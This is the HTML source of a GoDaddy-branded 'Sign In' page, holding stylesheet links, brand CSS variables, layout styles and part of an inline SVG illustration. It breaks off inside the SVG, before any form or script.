<!DOCTYPE html>
<html lang="en" class="ux-app footer-html" dir="ltr">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Sign In</title>
  <link rel="stylesheet" href="https://img6.wsimg.com/wrhs/14d7f3a2923c91b486959f53c66eba1c/uxcore2.min.css"
  media="all" />

  <link rel="stylesheet" href="https://img6.wsimg.com/wrhs/735848e797672aa267e9184706143682/utilityheader.min.css"
  media="all" id="header-asset" />

    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <link rel="preload" href="https://img6.wsimg.com/ux/fonts/gd-sage/1.0/gd-sage-bold.woff2" as="font" type="font/woff2"
      crossOrigin />
    <link rel="preload" href="https://img6.wsimg.com/ux/fonts/sherpa/2.0/gdsherpa-vf.woff2" as="font" type="font/woff2"
      crossOrigin />
      <style>
        input:focus ~ .floating-label,
        input:not(:focus):valid ~ .floating-label{
          top: -7px;
          bottom: 30px;
          font-size: 12px;
          color: gray;
          opacity: 1;
        }
    
        .floating-label {
          position: absolute;
          pointer-events: none;
          transition: 0.2s ease all;
        }
      </style>
  <style>
    @font-face {
      font-family: gd-sage;
      src: url(https://img6.wsimg.com/ux/fonts/gd-sage/1.0/gd-sage-bold.woff2) format("woff2"), url(https://img6.wsimg.com/ux/fonts/gd-sage/1.0/gd-sage-bold.woff) format("woff");
      font-weight: 700;
      font-display: swap;
    }
  
    @font-face {
      font-family: gdsherpa;
      src: url(https://img6.wsimg.com/ux/fonts/sherpa/2.0/gdsherpa-vf.woff2) format("woff2");
      font-weight: 300 700;
      font-display: swap;
    }
  </style>
  <link rel="stylesheet" href="https://img6.wsimg.com/wrhs/7c4a123069c201ce75da66eda7f84144/uxcore2.min.css"
    media="all" />
  <link rel="stylesheet" href="https://img6.wsimg.com/wrhs/85b267d197afda6bb67889db163a4058/utilityheader.min.css"
    media="all" id="header-asset" />
  <style>
    /* godaddy:brand v14 prod */
    :root {
      --ux-1s0t9v0: 0.7023319615912209rem;
      --ux-vvspv2: 1rem;
      --ux-xwz0yz: 1.2;
      --ux-97h3vl: #d4dbe0;
      --ux-19wr3kq: 1px;
      --ux-1067ph9: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-sm2he3: 500;
      --ux-1w31hux: 1.5;
      --ux-1fi898z: #708090;
      --ux-le566q: #999;
      --ux-16m8zm9: #905;
      --ux-ci632o: #690;
      --ux-1jw5w47: #9a6e3a;
      --ux-ps2t1y: #07a;
      --ux-1b06mhh: #DD4A68;
      --ux-gw3pxw: #e90;
      --ux-2domxp: #d6d6d6;
      --ux-2jubes: 4px;
      --ux-wikx71: #1976d2;
      --ux-1np4r62: transparent;
      --ux-1q7rsup: 2px;
      --ux-oc0naw: 1rem;
      --ux-16aixzc: 1rem;
      --ux-18ime9a: 1.375rem;
      --ux-1le7uoa: #111;
      --ux-1fzd9l5: transparent;
      --ux-jg1026: 1.5rem;
      --ux-1s5tndb: 0;
      --ux-cao06b: #fff;
      --ux-1leynsm: #111;
      --ux-by6mab: #767676;
      --ux-3lhizs: 1px;
      --ux-k4t5bc: #00a4a6;
      --ux-yscvvt: #ef6c0f;
      --ux-3seoiy: #744bc4;
      --ux-ifyf3f: #aa6d00;
      --ux-1c4rju4: #1976d2;
      --ux-1qsbael: #db1802;
      --ux-vsd31q: #00a4a6;
      --ux-1afwtm7: #ef6c0f;
      --ux-3uv4tc: #744bc4;
      --ux-iievdt: #aa6d00;
      --ux-cxbe8g: 1rem;
      --ux-ekirkm: #f5f2f0;
      --ux-145pjib: #000;
      --ux-jqgd0i: #111;
      --ux-1pfsknb: 1.423828125rem;
      --ux-1smybcz: .875rem;
      --ux-1dbu8ei: #111;
      --ux-1nr6ynb: 500;
      --ux-1lxyxj9: normal;
      --ux-1oqjeuu: 0;
      --ux-10jlyin: #000;
      --ux-99lo9: #1976d2;
      --ux-ux0m8o: #db1802;
      --ux-1wlhylv: transparent;
      --ux-p4h24g: .875rem;
      --ux-9ic57q: 2rem;
      --ux-9wtaa3: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-3z6ccd: 500;
      --ux-hm1ty7: 1.5;
      --ux-15ks663: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-aarlu5: 700;
      --ux-h93mi7: 1.5;
      --ux-p4wcd9: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-1a9e4a3: 500;
      --ux-1pw8hzd: 1.25;
      --ux-11opjp5: 2;
      --ux-1n2ego0: .8rem;
      --ux-uzt9o6: 0;
      --ux-gfnupv: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-j40yyd: 700;
      --ux-jw5s9j: 1.5;
      --ux-12zlqr9: .875rem;
      --ux-1wbe5uo: .75rem;
      --ux-1owc8nc: transparent;
      --ux-ut3xrx: #09757a;
      --ux-f7kpiw: #00a4a6;
      --ux-1gutwvn: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-g9ierp: 500;
      --ux-1dje42v: 1.5;
      --ux-shg991: "gd-sage", "Times New Roman", serif;
      --ux-c539b7: 500;
      --ux-p25s1t: 1.25;
      --ux-1klxlj4: 1rem;
      --ux-1q1acnc: .875rem;
      --ux-uoagkw: 500;
      --ux-1jw1vht: #bac0c3;
      --ux-bs151i: #d6d6d6;
      --ux-acokjr: #d8efef;
      --ux-1jc2o1e: #004249;
      --ux-vhce6u: #d6d6d6;
      --ux-195rcgy: 500;
      --ux-1g1i1da: #2b2b2b;
      --ux-1nu8itt: #fff;
      --ux-1glcx6s: #2b2b2b;
      --ux-1szqg1n: #111;
      --ux-1p4dc1z: transparent;
      --ux-14n8p36: #1976d2;
      --ux-1bul8sw: 500;
      --ux-11du3iw: 500;
      --ux-1qbop1h: 900;
      --ux-1c9yx5s: #bac0c3;
      --ux-2okpka: #bac0c3;
      --ux-1xliuhi: #00a4a6;
      --ux-1no0ng9: #fff;
      --ux-1rwkbsh: transparent;
      --ux-2rqapw: #09757a;
      --ux-117cu43: "gdsherpa", Helvetica, Arial, sans-serif;
      --ux-8n6y9x: 500;
      --ux-mgbt9j: 1.5;
      --ux-1ouw3v4: #e20087;
      --ux-y66o47: #111;
      --ux-2lqd62: .75rem;
      --ux-bt2zqe: 700;
      --ux-1qbn65p: #f4f8fc;
      --ux-1ds8u13: transparent;
      --ux-1bdtclp: transparent;
      --ux-kdwujq: #111;
      --ux-77zzwv: #00A4A6;
      --ux-1lv81i7: 1.2rem;
      --ux-28rjk: 500;
      --ux-1x4w1cu: #f5f5f5;
      --ux-1oqmm01: 1em;
      --ux-vk6635: #d6d6d6;
      --ux-y3mv0: #d6d6d6;
      --ux-e0ldzz: #00a63f;
      --ux-1woug6n: #444444;
      --ux-ceou01: #DB1802;
      --ux-io2uwb: transparent;
      --ux-1vw9arb: #d6d6d6;
      --ux-1i7a912: #d3c1f7;
      --ux-b0nj5b: transparent;
      --ux-18hc5o7: transparent;
      --ux-16apl5s: 2;
      --ux-1zta3b: #f4f8fc;
      --ux-1llin8a: 1.25em;
      --ux-7a9pn9: 700;
      --ux-1qsry5z: normal;
      --ux-1tx8bkn: #600801;
      --ux-1gpjrd8: #d6d6d6;
      --ux-1p5s1n4: #111;
      --ux-1nx9aml: #2b2b2b;
      --ux-1im0suq: #000;
      --ux-11i8wqh: #fff;
      --ux-1kpdpz9: transparent;
      --ux-1nk9qds: #767676;
      --ux-13yftfi: transparent;
      --ux-4kfa9g: transparent;
      --ux-492jj: transparent;
      --ux-ez3zlc: transparent;
      --ux-1ysi6jp: #111;
      --ux-ji3i29: 700;
      --ux-11ovj8p: .875rem;
      --ux-emb11o: #004249;
      --ux-9qpf6c: #00a4a6;
      --ux-h6e7c1: #fff;
      --ux-1a8ld87: #111;
      --ux-1e4z3ma: transparent;
      --ux-cup4ju: #d8efef;
      --ux-1kyybpb: #09757a;
      --ux-1ld6fs6: .875rem;
      --ux-1xzzhyl: #111;
      --ux-16dmnu8: #767676;
      --ux-94p9fm: 500;
      --ux-1mh0ktr: #f4f8fc;
      --ux-1utwv7e: #111;
      --ux-15qjz45: transparent;
      --ux-1e85ids: #09757a;
      --ux-1m7qrkf: #f5f7f8;
      --ux-unx9i2: #00a4a6;
      --ux-c5mlr8: #111;
      --ux-t04p4h: #fff;
      --ux-sywk25: #00A4A6;
      --ux-1lw8azc: #fff;
      --ux-1rfp50t: #ddeaf8;
      --ux-1u2jy43: #f4f8fc;
      --ux-1b26o0z: #fff;
      --ux-em0gr: #9fffb8;
      --ux-1tgn1ki: #ffeea9;
      --ux-ako3l5: #111;
      --ux-7j9lri: #f5f7f8;
      --ux-1v7sr65: transparent;
      --ux-11cn5p4: #00a4a6;
      --ux-772dne: .875rem;
      --ux-1hfks3w: 500;
      --ux-xkgc86: #2b2b2b;
      --ux-1marogz: #DB1802;
      --ux-17htz86: #fff;
      --ux-l7zq7p: #f5f7f8;
      --ux-vuekow: #111;
      --ux-1iiiqs3: #ffbbbb;
      --ux-bsmnmn: #fbd9ed;
      --ux-60ig31: transparent;
      --ux-1ymu8yg: #111111;
      --ux-mk2ln9: #d6d6d6;
      --ux-c9uvim: #09757a;
      --ux-187j9dd: #f4f8fc;
      --ux-1hnbfne: #00a4a6;
      --ux-1r87102: #fff;
      --ux-w7826f: #111;
      --ux-7wu8i7: #111;
      --ux-1o8cusa: #fff;
      --ux-18lg5k: #a6fff8;
      --ux-qnydfw: #111;
      --ux-e5ryhe: #111;
      --ux-1pqaqki: #E20087;
      --ux-1mph5ru: #111;
      --ux-l48e4z: #111;
      --ux-3i0zzw: transparent;
      --ux-10kwq3t: #09757a;
      --ux-ivu8ja: #f5f7f8;
      --ux-1j87vvn: #09757a;
      --ux-9i7okd: #F5F7F8;
      --ux-1xxygco: #5E5E5E;
      --ux-pdb1vi: #111;
      --ux-15ftva1: 80%;
      --ux-3rg0ia: #bac0c3;
      --ux-tnqad1: #09757a;
      --ux-18hlgn4: #f4f8fc;
      --ux-bg7olm: #f4f8fc;
      --ux-w3lhdp: #600801;
      --ux-1331zgr: #111;
      --ux-bgke81: #444;
      --ux-xaxxaq: #111;
      --ux-1ygutpa: #111;
      --ux-1rklle7: #2b2b2b;
      --ux-1gm3rf3: rgba(0, 0, 0, .425);
      --ux-5jg1u4: normal;
      --ux-1utwyy9: #444;
      --ux-uyojp0: 500;
      --ux-1njwmlo: #111;
      --ux-1novelo: #ae1302;
      --ux-n0tova: #AE1302;
      --ux-5mgu1z: #444;
      --ux-1ixzvrg: #00a4a6;
      --ux-5n4ibx: #d4dbe0;
      --ux-1iwsz6x: #111;
      --ux-t61743: #1BDBDB;
      --ux-13vrbmz: #fff;
      --ux-1xeg43i: #111;
      --ux-asxrqp: #aab7c2;
      --ux-170hi5o: #f5f7f8;
      --ux-yp4309: #09757a;
      --ux-sji811: #00a63f;
      --ux-lt9ehq: normal;
      --ux-11sf7bz: transparent;
      --ux-1hei7eo: #db1802;
      --ux-1ykdrsm: transparent;
      --ux-1she0w: #111;
      --ux-8qoawt: #111;
      --ux-kkdx4n: #111;
      --ux-17fhz5j: #2b2b2b;
      --ux-1oppzsi: transparent;
      --ux-1tqourc: transparent;
      --ux-1sjqecz: #f5f5f5;
      --ux-a6rxy5: #00a4a6;
      --ux-144ksq0: #fff;
      --ux-1c5c9sy: #09757a;
      --ux-16d2ul: #db1802;
      --ux-6wr86x: #aab7c2;
      --ux-gdy377: #f4f8fc;
      --ux-k4fkva: #111;
      --ux-1ehwjjs: #00a4a6;
      --ux-1uyxcq5: #fff;
      --ux-953c7l: #111;
      --ux-1wp39lq: #00A4A6;
      --ux-1pvg8dx: #00a4a6;
      --ux-18vqnuy: #09757a;
      --ux-car98n: #db1802;
      --ux-qebq9u: #f4f8fc;
      --ux-6gm31z: #111;
      --ux-11rtwg8: #f4f8fc;
      --ux-1e4ese5: #111;
      --ux-926l8f: #600801;
      --ux-17znn9m: #fff;
      --ux-vhbo95: #111;
      --ux-lrwu2k: #fff;
      --ux-ran6wz: #444;
      --ux-1ckzto6: #fff;
      --ux-1ely98k: #111;
      --ux-1vtao7i: #111;
      --ux-18qj45h: transparent;
      --ux-1vjximi: #db1802;
      --ux-14gkznj: #744bc4;
      --ux-15isxca: #fff;
      --ux-83yt9q: #ae1302;
      --ux-tt846z: #fff;
      --ux-1q4q36s: #AE1302;
      --ux-9cq6k1: #fff;
      --ux-ix2s5q: #00a4a6;
      --ux-19ykcyj: #fff;
      --ux-1iqicpb: rgba(245, 245, 245, 0.9);
      --ux-c3e9y2: #111;
      --ux-1uiriv5: transparent;
      --ux-1i83650: #111;
      --ux-44qvxk: #111;
      --ux-rm5d87: #d8efef;
      --ux-lgzajt: #09757a;
      --ux-16t61pw: #fff;
      --ux-104sznl: #111;
      --ux-vqhzzz: #fff;
      --ux-vwf4ne: #111;
      --ux-c624hh: #fff;
      --ux-1e7hthc: #09757a;
      --ux-wxwyd1: rgba(0, 0, 0, 0.425);
      --ux-i4fj7k: #fff;
      --ux-1lpd00q: #613ea3;
      --ux-n9sg1c: transparent;
      --ux-1gkt6kl: #1BDBDB;
      --ux-1ar08ze: transparent;
      --ux-h6e91r: #1BDBDB;
      --ux-1d8mwhj: #00a4a6;
      --ux-9gvyua: #111;
      --ux-1ap6ofp: #db1802;
      --ux-ny8bg2: #00a63f;
      --ux-aqzfxj: #fff;
      --ux-1g47djv: #de7c00;
      --ux-yl1aqy: transparent;
      --ux-15n32fv: #fff;
      --ux-1ajy4cm: #fff;
      --ux-38c183: #111;
      --ux-1l8kymk: #fff;
      --ux-1qc8i9l: #09757a;
      --ux-1a6cjk7: transparent;
      --ux-p3e15m: #db1802;
      --ux-1f7pqen: #fff;
      --ux-10zrx9t: transparent;
      --ux-e1mf41: #145fa9;
      --ux-1m9ys0v: #767676;
      --ux-143smq7: #E20087;
      --ux-1ep3kxj: #00a63f;
      --ux-lv1r6m: #de7c00;
      --ux-1fhc073: #DB1802;
      --ux-1iwdp0z: #b4006c;
      --ux-md12r6: #00a4a6;
      --ux-177t0p3: #fff;
      --ux-cuskv8: #09757a;
      --ux-wi4oww: #fff;
      --ux-1j2zkam: #fff;
      --ux-3lso4u: #fff;
      --ux-zk0uja: #fff;
      --ux-tqp5z3: #fff;
      --ux-o3neug: #d8efef;
      --ux-1ko0ujh: #09757a;
      --ux-17o0ohq: #fff;
      --ux-s2edbm: #fff;
      --ux-1gbjqnn: #d6d6d6;
      --ux-hje0py: #111;
      --ux-c419qd: #fff;
    }
  </style>
  <link href="https://img6.wsimg.com/ux/favicon/manifest.json" rel="manifest">
  <link rel="apple-touch-icon" sizes="57x57" href="https://img6.wsimg.com/ux/favicon/apple-icon-57x57.png">
  <link rel="apple-touch-icon" sizes="60x60" href="https://img6.wsimg.com/ux/favicon/apple-icon-60x60.png">
  <link rel="apple-touch-icon" sizes="72x72" href="https://img6.wsimg.com/ux/favicon/apple-icon-72x72.png">
  <link rel="apple-touch-icon" sizes="76x76" href="https://img6.wsimg.com/ux/favicon/apple-icon-76x76.png">
  <link rel="apple-touch-icon" sizes="114x114" href="https://img6.wsimg.com/ux/favicon/apple-icon-114x114.png">
  <link rel="apple-touch-icon" sizes="120x120" href="https://img6.wsimg.com/ux/favicon/apple-icon-120x120.png">
  <link rel="apple-touch-icon" sizes="144x144" href="https://img6.wsimg.com/ux/favicon/apple-icon-144x144.png">
  <link rel="apple-touch-icon" sizes="152x152" href="https://img6.wsimg.com/ux/favicon/apple-icon-152x152.png">
  <link rel="apple-touch-icon" sizes="180x180" href="https://img6.wsimg.com/ux/favicon/apple-icon-180x180.png">
  <link rel="icon" type="image/png" sizes="192x192" href="https://img6.wsimg.com/ux/favicon/android-icon-192x192.png">
  <link rel="icon" type="image/png" sizes="16x16" href="https://img6.wsimg.com/ux/favicon/favicon-16x16.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://img6.wsimg.com/ux/favicon/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="96x96" href="https://img6.wsimg.com/ux/favicon/favicon-96x96.png">
  <link rel="mask-icon" href="https://img6.wsimg.com/ux/favicon/safari-pinned-tab.svg" color="#52c4cb">
  <meta name="msapplication-TileColor" content="#111111">
  <meta name="msapplication-TileImage" content="https://img6.wsimg.com/ux/favicon/ms-icon-144x144.png">
  <meta name="msapplication-config" content="https://img6.wsimg.com/ux/favicon/browserconfig.xml">
  <meta name="theme-color" content="#111">
  <link rel="manifest" href="https://img6.wsimg.com/ux/favicon/manifest.json">
  <style>
    #left-col {
      display: none !important
    }
  
    body {
      min-height: 0 !important
    }
  
    body.ux-app.uxf-flex.market-selector-open {
      overflow: scroll
    }
  
    html {
      background-size: 0;
      background-position: top center;
      background-repeat: no-repeat
    }
  
    #back-link {
      display: inline-block;
      margin-left: 26px;
      margin-top: 40px
    }
  
    .lg-container {
      margin: 0 auto
    }
  
    #login-container,
    #side-by-side-container {
      margin-top: 0
    }
  
    @media screen and (min-width:520px) {
  
      #login-container,
      #side-by-side-container {
        margin-top: 10px
      }
    }
  
    @media screen and (min-width:768px) {
  
      #login-container-row,
      #side-by-side-container-row {
        display: flex
      }
  
      #login-container-col,
      #side-by-side-container-col {
        margin-bottom: 10px
      }
  
      #left-col {
        display: block !important
      }
    }
  
    @media screen and (min-width:992px) {
      .lg-container {
        width: 980px
      }
  
      #login-container-parent,
      #side-by-side-container-parent {
        display: table
      }
  
      #login-container-col,
      #side-by-side-container-col {
        width: 460px
      }
  
      #login-container,
      #side-by-side-container {
        margin-top: 40px
      }
  
      html {
        background-size: cover !important
      }
  
      body {
        background-color: transparent !important
      }
    }
  
    @media screen and (min-width:1200px) {
  
      #login-container-col,
      #side-by-side-container-col {
        width: 565px
      }
  
      .lg-container {
        width: 1150px
      }
    }
  </style>
  <style>
    #pass-bg {
      position: absolute;
      top: 20%;
      width: 50%;
      display: none
    }
  
    .svg-fill-gray-dark {
      fill: #2b2b2b !important
    }
  
    .svg-stroke-gray-dark {
      stroke: #2b2b2b !important
    }
  
    .svg-fill-gray-light {
      fill: #aab7c2 !important
    }
  
    .svg-stroke-gray-light {
      stroke: #aab7c2 !important
    }
  
    @media screen and (min-width:992px) {
      #pass-bg {
        display: block
      }
    }
  </style>
  <link href="https://img6.wsimg.com/auth-python-static-assets/4656/img/favicon.ico" rel="shortcut icon"
    type="image/vnd.microsoft.icon">
  <style>
    html {
      height: 100%;
      overflow: hidden;
    }
  
    body {
      overflow: auto;
      height: 100%;
      display: flex;
      flex-direction: column;
    }
  
    #content {
      flex: 1 0 auto;
    }
  
    #footer {
      display: none;
      flex-shrink: 0;
      background-color: white;
    }
  
    .language-header {
      border-bottom: 0;
    }
  
  
    iframe[src$='149e9513-01fa-4fb0-aad4-566afd725d1b/2d206a39-8ed7-437e-a3be-862e0f06eea3/fp'] {
      position: absolute;
    }
  </style>
</head>

<body class="ux-app uxf-flex">
  <div id="content">
    <div id="pass-bg"><svg viewBox="0 0 677 395">
      <g id="a274fe">
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4"
          d="M2 243.66h196.88M216.22 243.94l458.71-.04" class="svg-fill-none svg-stroke-gray-dark" />
        <rect x="523.08" y="269.84" width="84.33" height="20.88" rx="2" ry="2" stroke-linecap="round"
          stroke-miterlimit="10" stroke-width="4" class="svg-fill-white svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4" d="M598.4 279.68h-66.67"
          class="svg-fill-none svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4"
          d="M593.33 215.84v44.84h-56.17V179.3h56.17v17.88" class="svg-fill-primary-o svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          d="M546.16 236.83l13.95-13.94M548 251.17l13.94-13.94" class="svg-fill-none svg-stroke-white" />
        <path
          d="M593.33 179.3v-13.62a2 2 0 0 0-2-2h-52.17a2 2 0 0 0-2 2v13.62zM537.16 260.68v17a2 2 0 0 0 2 2h52.17a2 2 0 0 0 2-2v-17z"
          stroke-miterlimit="10" stroke-width="4" class="svg-fill-white svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4" d="M553.99 171.3h21.75"
          class="svg-fill-none svg-stroke-gray-light" />
        <circle cx="564.87" cy="270.3" r="3.75" class="svg-fill-gray-light" />
        <path
          d="M309.65 325.29h170.9a8.47 8.47 0 0 1 8.44 8.44v42.9a8.47 8.47 0 0 1-8.44 8.44H267.4a8.47 8.47 0 0 1-8.44-8.44v-42.9a8.47 8.47 0 0 1 8.44-8.44h27.22"
          stroke-linecap="round" stroke-miterlimit="10" stroke-width="4"
          class="svg-fill-white svg-stroke-gray-dark" />
        <rect x="269.31" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="289" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="308.69" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="328.39" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="348.08" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="367.78" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="387.47" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="407.17" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="426.86" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="446.55" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="466.25" y="335.84" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="279.39" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="299.08" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="318.78" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="338.47" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="358.16" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="377.86" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="397.55" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="417.25" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="436.94" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="456.64" y="349.9" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="269.31" y="363.97" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="289" y="363.97" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <path
          d="M436.71 363.97h-125.2a2.82 2.82 0 0 0-2.81 2.82v5.62a2.82 2.82 0 0 0 2.81 2.82h125.2a2.82 2.82 0 0 0 2.81-2.82v-5.62a2.82 2.82 0 0 0-2.81-2.82z"
          class="svg-fill-gray-light" />
        <rect x="446.55" y="363.97" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <rect x="466.25" y="363.97" width="12.66" height="11.25" rx="2.81" ry="2.81" class="svg-fill-gray-light" />
        <path
          d="M194.07 392.35a22.06 22.06 0 0 1-22-22v-26a21.83 21.83 0 0 1 2.6-10.36 22.13 22.13 0 0 1 19.4-11.64 22.06 22.06 0 0 1 22 22v26a22.06 22.06 0 0 1-22 22z"
          class="svg-fill-white" />
        <path
          d="M209.6 328.81a21.89 21.89 0 0 0-15.53-6.46 22.06 22.06 0 0 0-22 22v26a22.06 22.06 0 0 0 22 22 22.06 22.06 0 0 0 22-22v-26a21.78 21.78 0 0 0-.83-6"
          stroke-linecap="round" stroke-miterlimit="10" stroke-width="3.838"
          class="svg-fill-none svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
          d="M188.46 353.84h-16M189.65 359.84h-17.19M191.2 365.84h-18.74M193.45 371.84h-20.83M196.27 377.84h-22.31M200.15 383.84h-23.38"
          class="svg-fill-none svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          d="M172.46 345.1h43.1M194.06 323.18v21.92" class="svg-fill-none svg-stroke-gray-dark" />
        <path d="M212.45 43.4a39.75 39.75 0 1 1-68 41.17" fill="#fee782" />
        <path
          d="M170.4 83.39a19.18 19.18 0 0 1-6.88-6.73M196.5 56.68a19.28 19.28 0 0 1-12.24 28.8M105.44 241.9L67.16 133.96M66.04 128.98L111.4 11.43h24"
          stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          class="svg-fill-none svg-stroke-gray-dark" />
        <circle cx="66.32" cy="128.93" r="11" stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          class="svg-fill-gray-light svg-stroke-gray-dark" />
        <path d="M136.4 29.8a18.32 18.32 0 1 1 31.33-19z" stroke-linecap="round" stroke-linejoin="round"
          stroke-width="4" class="svg-fill-gray-light svg-stroke-gray-dark" />
        <path d="M219.4 42.82l-88.43 53.53a55.95 55.95 0 0 1 88.9-67" stroke-linecap="round" stroke-linejoin="round"
          stroke-width="4" class="svg-fill-gray-light svg-stroke-gray-dark" />
        <path d="M58.4 272.29v10.07c0 5.44 20.63 9.84 46.08 9.84s46.08-4.4 46.08-9.84v-10.07z" stroke-miterlimit="10"
          stroke-width="4" class="svg-fill-gray-light svg-stroke-gray-dark" />
        <path
          d="M141.03 265.36c6 1.66 9.55 3.74 9.55 6 0 5.44-20.63 9.84-46.08 9.84s-46.1-4.41-46.1-9.85 20.63-9.84 46.08-9.84a184.56 184.56 0 0 1 25.37 1.67"
          stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          class="svg-fill-white svg-stroke-gray-dark" />
        <path d="M92.98 268.35v-22.82a5.77 5.77 0 0 1 5.76-5.76h11.52a5.77 5.77 0 0 1 5.76 5.76v22.82"
          stroke-linecap="round" stroke-miterlimit="10" stroke-width="4"
          class="svg-fill-gray-light svg-stroke-gray-dark" />
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
          d="M125.49 49.19l10.83-6.62M124.07 57.09l13.72-8.38M123.03 64.76l16.69-10.2M122.9 71.87l19.24-11.76M123.89 78.29l20.83-12.72M125.58 84.3l22.88-13.99M127.83 89.95l24.84-15.18"
          class="svg-fill-none svg-stroke-gray-dark" />
        <path
          d="M347.4 280.73h77.32a7.11 7.11 0 0 0 7.09-7.09v-1.18c0-3.9-2.94-4.45-7.09-7.09l-10.66-6-6-41.34h-70.57l-6 41.34-11 6c-3.3 2-7.08 3.19-7.08 7.09v1.18a7.11 7.11 0 0 0 7.08 7.09h9.18"
          class="svg-fill-white" />
        <path
          d="M347.4 280.73h77.32a7.11 7.11 0 0 0 7.09-7.09v-1.18c0-3.9-2.94-4.45-7.09-7.09l-10.66-6-6-41.34h-70.57l-6 41.34-11 6c-3.3 2-7.08 3.19-7.08 7.09v1.18a7.11 7.11 0 0 0 7.08 7.09h9.18"
          stroke-linecap="round" stroke-linejoin="round" stroke-width="4"
          class="svg-fill-none svg-stroke-gray-dark" />
        <path
          d="M501.9 164.05v54.22a6.78 6.78 0 0 1-6.67 6.85H249.9a6.79 6.79 0 0 1-6.67-6.85V22.91a6.79 6.79 0 0 1 6.67-6.85h245.33a6.78 6.78 0 0 1 6.67 6.85v123.42"
          stroke-linecap="round" stroke-miterlimit="10" stroke-width="4"
          class="svg-fill-white svg-stroke-gray-dark" />
        <path
          d="M262.98 186.41a5 5 0 0 1-4.88-5.09V36.05a5 5 0 0 1 4.88-5.09h220.1a5 5 0 0 1 4.88 5.09v145.27a5 5 0 0 1-4.88 5.09z"
          class="svg-fill-primary-o" />
        <path
          d="M483.08 32.96a3 3 0 0 1 2.88 3.09v145.27a3 3 0 0 1-2.88 3.09h-220.1a3 3 0 0 1-2.88-3.09V36.05a3 3 0 0 1 2.88-3.09h220.1m0-4h-220.1a7 7 0 0 0-6.88 7.09v145.27a7 7 0 0 0 6.88 7.09h220.1a7 7 0 0 0 6.88-7.09V36.05a7 7 0 0 0-6.88-7.09z"
          class="svg-fill-gray-dark" />
        <path d="M362.4 133.97h-.17" class="svg-fill-primary-o" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4" d="M260.88 210.94h26.99"
          class="svg-fill-none svg-stroke-gray-dark" />
        <circle cx="373.01" cy="204.74" r="6.2" stroke-miterlimit="10" stroke-width="4"
          class="svg-fill-gray-light svg-stroke-gray-dark" />
        <circle cx="300.27" cy="210.94" r="3.54" class="svg-fill-gray-dark" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4" d="M304.88 44.28h49.99"
          class="svg-fill-none svg-stroke-white" />
        <circle cx="294.6" cy="44.28" r="3.54" class="svg-fill-white" />
        <circle cx="282.6" cy="44.28" r="3.54" class="svg-fill-white" />
        <circle cx="270.6" cy="44.28" r="3.54" class="svg-fill-white" />
        <circle cx="433.63" cy="491.5" r="41.25" transform="rotate(-20.7 -642.512 469.233)" class="svg-fill-white" />
